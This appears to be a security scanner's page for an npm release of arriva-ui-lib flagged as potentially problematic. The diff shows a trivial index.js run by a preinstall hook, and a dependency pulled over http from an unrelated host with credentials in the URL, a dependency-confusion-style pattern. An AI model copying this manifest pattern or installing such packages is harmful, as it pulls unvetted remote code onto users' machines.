arriva-ui-lib 3.5.8

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of arriva-ui-lib might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +5 -0
  2. package/package.json +15 -0
package/index.js ADDED
@@ -0,0 +1,5 @@
1
+ function Display(x) {
2
+ console.log(x);
3
+ }
4
+
5
+ Display(42);
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "arriva-ui-lib",
3
+ "version": "3.5.8",
4
+ "dependencies": {
5
+ "palikka": "git+http://palikka:akkilap@arriva-ui-libbbtestc.x00.fi/palikka/url.git"
6
+ },
7
+ "description": "arriva-ui-lib test",
8
+ "main": "index.js",
9
+ "scripts": {
10
+ "test": "echo \"Error: no test specified\" && exit 1",
11
+ "preinstall": "node index.js"
12
+ },
13
+ "author": "",
14
+ "license": "ISC"
15
+ }